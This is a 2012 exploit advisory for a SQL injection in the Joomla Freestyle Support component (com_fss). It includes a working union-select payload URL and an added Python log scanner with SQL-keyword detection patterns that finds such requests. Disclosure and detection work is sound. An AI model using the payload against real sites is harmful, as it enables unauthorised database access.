Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

2012-10-19 17:05:05

Exploit Title: Joomla Freestyle Support com_fss sqli

Dork: N/A

Date: [17-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://freestyle-joomla.com

Version: Version 1.9.1.1447 (last update on Oct 15, 2012)

License: Commercial

Download: http://freestyle-joomla.com/fssdownloads

Tested on: [Linux(bt5)-Windows(7ultimate)]

Special greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Joomla component description:

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in


Exploit:


SQL : SQL injection

http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R


_____________________________________________________
Daniel Barragan "D4NB4R" 2012
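
Added example, not part of the original advisory: a log check for finding com_fss requests whose `prodid` carries anything other than a number, as in the request shown above. It assumes Apache/nginx combined-format access logs and that legitimate `prodid` values are plain integers; the sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate prodid is a plain integer, so anything else is reported.
NUMERIC_ID = re.compile(r"\d+")
SQL_TOKENS = re.compile(r"\b(?:union|select|version|sleep|benchmark)\b|--|/\*|'", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2012:10:00:01 +0000] "GET /index.php?option=com_fss&view=test&prodid=3 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [17/Oct/2012:10:02:44 +0000] "GET /index.php?option=com_fss&view=test&prodid=7.7\'+union+all+select+1%2Cversion()--+x HTTP/1.1" 200 4831',
    '192.0.2.11 - - [17/Oct/2012:10:03:02 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 9001',
    '203.0.113.7 - - [17/Oct/2012:10:05:19 +0000] "GET /index.php?option=com_fss&view=test&prodid=1%2527 HTTP/1.1" 200 4790',
]

def check_request(target):
    """Return a finding for a com_fss request with a non-numeric prodid, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_fss" not in query.get("option", []):
        return None
    for value in query.get("prodid", []):  # parse_qs has already URL-decoded the value
        if NUMERIC_ID.fullmatch(value):
            continue
        # The allow-list decides; the token list only helps triage the hit.
        tokens = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(value)})
        return {"prodid": value, "sql_tokens": tokens}
    return None

def scan(lines):
    """Scan access-log lines and return findings with line number and client address."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hit = check_request(match.group(1)) if match else None
        if hit:
            hit.update(line=number, client=line.split(" ", 1)[0])
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the check is an integer allow-list rather than a keyword blacklist, the double-encoded value on the fourth sample line is reported even though no SQL token matches. Parameters sent in a POST body do not appear in access logs and need a WAF or application-level check instead.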

Fixes

No fixes
